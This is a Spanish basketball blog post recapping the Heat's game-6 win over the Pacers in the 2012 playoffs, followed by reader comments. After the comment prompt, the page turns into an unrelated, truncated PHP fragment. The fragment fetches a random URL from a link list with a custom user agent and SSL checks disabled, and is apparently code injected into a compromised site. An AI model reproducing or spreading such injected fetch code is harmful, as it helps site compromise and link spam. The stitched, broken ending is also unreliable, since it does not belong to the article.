La Crónica: Big two is enough

25 de May de 2012 por txusma

Alguien comentaba ayer que si Wade vistiera la camiseta de Indiana estos serían campeones.

Premonitorio. Ayer “Flash” se quitó la espina del tercer choque, el día del encontronazo con Spoelstra, mostrándose imparable y certificando el pase a la final del Este. Es impresionante que lo hayan logrado con LeBron jugando de 4 y Joel Anthony como baluarte interior. Cuánto le deben en Miami al bueno de Joel. Según el propio Wade, esta racha de 3 partidos es la cima de juego del equipo este curso (y sin Bosh). Estamos de acuerdo.

Los Pacers entraron en este 6º choque a morder, con ese nivel de agresividad que echaron tanto de menos en la última derrota y arropados por la parroquia. West y Granger, despejando las dudas sobre su teórica merma física, controlaban bien al dúo dinámico de los Heat y dominaban los rebotes. Consiguieron un primer parcial de 15-5 en 6 minutos y cerraron el cuarto con un convincente 28-21.

Es en el segundo cuando comienza la pesadilla Wade. En un par de minutos la ventaja se diluye. Anota 3 canastas y un mate en un abrir y cerrar de ojos y convierte 2 canastas más y 4 tiros libres antes del final, para un total de 16 puntos en el cuarto. Más de la mitad de los 30 que golpeaban al hígado de los sistemas defensivos de Frank Voguel.

En el tercer periodo Indiana trataba de cambiar el guíon, bajando mucho el ritmo para evitar esos contragolpes terroríficos de Miami. No les fue mal del todo y llegaban al último minuto del cuarto con el marcador igualado. Sin embargo, en ese instante, la intendencia de los Heat asestaba un golpe casi definitivo. Canasta de Joel, y dos triples de Miller y Chalmers ponían la diferencia en 10 puntos en un abrir y cerrar de ojos.

Al borde de la eliminación los Pacers buscaron la reacción pero sin demasiada fe. En esos momentos fue LeBron quien tomó el control del choque y administró magistralmente la ventaja. Wade mantuvo su anotación constante (103-95). La actuación de la pareja esta serie (40-18 de LeBron en el 4º y 40-10 de Wade anoche) sólo tiene precedentes en la Kobe&Shaq de 2001, también de infausto recuerdo para Indiana. Una doble amenaza que los Pacers han sido incapaces de frenar.

PREMIOS

MVP: Apareció Dwyane Wade y se acabó el cuento. 41 puntos y 10 rebotes que se añadieron a la habitual producción de Lebron James (28-6-7). Si estos 2 funcionan, no hay bajas que valgan.

Sorpresa: Hay veces que cuesta creer que los Heat vayan a encontrar un base más adecuado a su juego que Mario Chalmers. 15 puntos y ninguna pérdida, justo lo que se le pide.

Decepción: Creo que los aficionados de los Pacers esperaban más de Darren Collison, relegado finalmente al papel de base suplente. Anoche se quedó en 5 puntos.

Esfuerzo en vano: David West aprovechó las bajas en el juego interior de los Heat para anotar 24 puntos. George Hill también jugó un buen partido (18 puntos). ¿Recompensa? Descanso hasta octubre.

Imágenes | AP Photos / Getty Images

Comenta

10 comentarios a esta entrada

  1. HisRoyalAirness dice:
    #1

    Y el otro día el personal diciendo que había que traspasarlo…en fin

      Citar

  2. GreenPride dice:
    #2

    Pues se ha confirmado que cuando Wade acompaña a LeBron los Heat no han tenido rival en los Pacers.
    Estos Pacers son un equipo con muy buenos jugadores y bien entrenados pero les falta claramente una referencia de la que tirar a la hora de poder ganar una serie como esta. Además sus exteriores han demostrado no ser grandes pasadores y en general han naufragado en el intento de dar balones con constancia y en buenas posiciones a sus interiores que deberían haber machacado a los de los Heat.
    El principio del partido marcó lo que deberían haber hecho y no han podido en esta serie. Balones interiores a West que abusaba de Battier y a Hibbert. Los Heat no podían correr y los exteriores aprovechaban los huecos de las ayudas. Pero poco a poco los Pacers fueron perdiendo el norte y la gran actuación de Wade fue sacándoles del partido. Fenomenal partido de Flash enjugando su horrible inicio de la serie con 3 grandes partidos finales (en realidad 2 y medio). Con él a este nivel no hay techo para los Heat, sobre todo si recuperan a Bosh para unas hipotéticas finales.
    Y sobre todo, fenomenal la serie de LeBron James. Supo aguantar casi en solitario a los Heat en los momentos más delicados de la primera parte del decisivo 4º y ha estado siempre muy por encima de sus pares. Ha hecho un gran esfuerzo por rebotear y defender al jugar de 4 y además en ataque ha seleccionado muy bien sus tiros en general. Ayer supo dejar protagonismo a Wade para al final del último cuarto coger la manija para mantener la ventaja sin problemas. Si además Chalmers y Miller ayudan con sus lanzamientos y Anthony aporta su defensa interior y su lucha volvemos a tener a los Heat como contendientes claros al anillo.
    Ahora en las Finales de Conferencia esperan unos poco talentosos Sixers o unos machacados Celtics. No veo como pueden hacerles frente ninguno de los 2. Creo que pasará Boston y creo que con su juego de veteranos pueden plantarles cara en algunos partidos pero veo difícil que la serie pase del 5º partido y casi imposible que no la ganen los Heat, sobre todo si vuelve Bosh. Si son los Sixers les darán más guerra física pero sus apagones en ataque no serán perdonados tanto como por Boston. Tampoco les veo ganando más allá de un partido pero ya hablaremos de ello.
    En cuanto a los Pacers, Bird seguro que ha tomado nota de lo que les hace falta, por algo les llamó blandos después del 5º. Tiene espacio salarial para el verano y piezas que le pueden servir en un trade así que es de esperar que se mueva para intentar conseguir esa estrellla que les hace falta para dar el último paso y ser candidatos al anillo. Si la consigue el futuro de los Pacers podría estar disputando a los Heat de verdad el Este en los próximos años. Yo optaría por traspasar a Granger que además es el que más cartel tiene pero el problema es a quién conseguir en ese traspaso o bien intentar conseguir a algún gran agente libre con el espacio salarial que les queda. Decepcionante Barbosa que ya no es lo que era y Collison que sólo tiene pequeños momentos de brillantez. Para dar otro paso también necesitan que gente como George y sobre todo Hibbert sigan progresando y puedan ser realmente decisivos en sus posiciones. Veremos que hace Bird este verano…

      Citar

  3. Ru dice:
    #3

    HisRoyalAirness:
    Y el otro día el personal diciendo que había que traspasarlo…en fin

    Yo lo sigo manteniendo Royal.El cambio ha venido tras lo de Spoelstra,llámalo orgullo,llámalo clase,cuando todo el mundo está pendiente de ti hago lo que quiero,cuando quiero y como quiero.Su nivel es el que ha dado en estos 3 últimos partidos de la serie pero no sé porqué se empeña en jugar a medio gas.Veo a LeBron y veo que da lo máximo cada noche,de Wade no puedo decir lo mismo…

    Estaba cantado el 4-2.Si Montes viviera cuantas veces habría dicho jugón en esta serie…

      Citar

  4. GreenPride dice:
    #4

    Estoy de acuerdo con Ru en cuanto a Wade. Parece que es un jugador al que le falta hambre competitiva para llegar a ser lo que su potencial indica. Y añadiría que sospecho que no trabaja lo suficiente en los veranos para mejorar, como si ya le valiese con lo bueno que es y no quisiera ser mejor. Una pena porque siendo un jugadorazo podría ser realmente increíble si mejorase su lanzamiento de media-larga distancia, ese punto de frialdad y pasotismo no le hace ningún bien a su juego, por el contrario cuando está enchufado es sin duda uno de los grandes.
    P.D. También de acuerdo en que a LeBron no lo veo igual, éste sí que parece dar más el callo cada noche y también haber mejorado su lanzamiento bastante en las últimas temporadas.

      Citar

  5. nba dice:
    #5

    Tampoco demos tantos palos a Wade, que menuda temporada se ha pegado con los problemas fisicos.
    Lo que han demostrado es que cuando se lo proponen no hay dios que los paren, y encima sin Bosh, da igual quien sea el otro finalista de conferencia estos van de cabeza a la final de la NBA porque asi lo han decidido Lebron-Wade.
    De Indiana, no esta mal llegar a donde han llegado , veremos que decide Bird en el verano, solo tienen que ir paso a paso, no agobiarse por esta eliminatoria.
    Un Granger-West por Pau-MWP-Ebanks??

      Citar

  6. Esteban dice:
    #6

    en mi opinion, todos han estado bastante confundidos, sobretodo con el tema hibbert

    en todos los portales he escuchado que los pacers deben darle mas bolas a hibbert, ahora yo digo, mas bolas?

    el gran partido de hibbert de 19 p y 18 rebotes, confundio, porq es mas casualidad q otra cosa, de hecho no ha tenido numeros simillres en el resto de los juegos

    los balones a hbibbert estuvieron, solo que no es shaq o howard, no es fuerte ni tiene habilidad suficiente para irse hasta los 30 puintos, y todos se lo pedian como si pudiese, con fuerza turiaf y anthony, podian marcarlo, traeria problemas, pero no doblaria el partido hibbert solo, y asi paso

    los pacers llegaron a donde estaban para llegar, quiza podrian haber vencido a los que estaban en la otra llave, pero la verdad, el rendimiento de granger en los minutos finales fue lamentable, todos los tiros mal tomados, triples abierto fallados y penetraciones forzadas sin ninguna resultado

    con una primera espada asi, no se puede llegar mas alla de primera ronda

      Citar

  7. Esteban dice:
    #7

    nba:
    Tampoco demos tantos palos a Wade, que menuda temporada se ha pegado con los problemas fisicos.
    Lo que han demostrado es que cuando se lo proponen no hay dios que los paren, y encima sin Bosh, da igual quien sea el otro finalista de conferencia estos van de cabeza a la final de la NBA porque asi lo han decidido Lebron-Wade.
    De Indiana, no esta mal llegar a donde han llegado , veremos que decide Bird en el verano, solo tienen que ir paso a paso, no agobiarse por esta eliminatoria.
    Un Granger-West por Pau-MWP-Ebanks??

    amigo, granger+west por pau, trade q vengo proponiendo hace rato

    pau es buenisimo, pero no tanto para que alguien este tan deseado de quererlo que se lleve los 7 millones de contrato de MWP

      Citar

  8. nba dice:
    #8

    Hombre Esteban es que en el Este no hay actualmente un defensor del perimetro como MWP, idas de olla aparte.
    Seria interesante una serie de playoffs en la que James-MWP se viesen las caras

      Citar

  9. Esteban dice:
    #9

    si metta es un buen defensor perimetral, es pesimo en ataque y tiene una cabecita bastante tocada, ademas de un año mas de contrato bastante alto

    me gustaria el trade, pero el dinero de metta deberia dirigirse a un escolta

      Citar

  10. HisRoyalAirness dice:
    #10

    Oye pero qué es eso de que Wade es conformista? Se ha pasado medio año lesionado.
    Ya que habláis de Lebron, Wade es 2 o 3 años mayor y cuando hay que rendir rinde.
    Las Finales del año pasado dónde estaba King? Pues eso

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>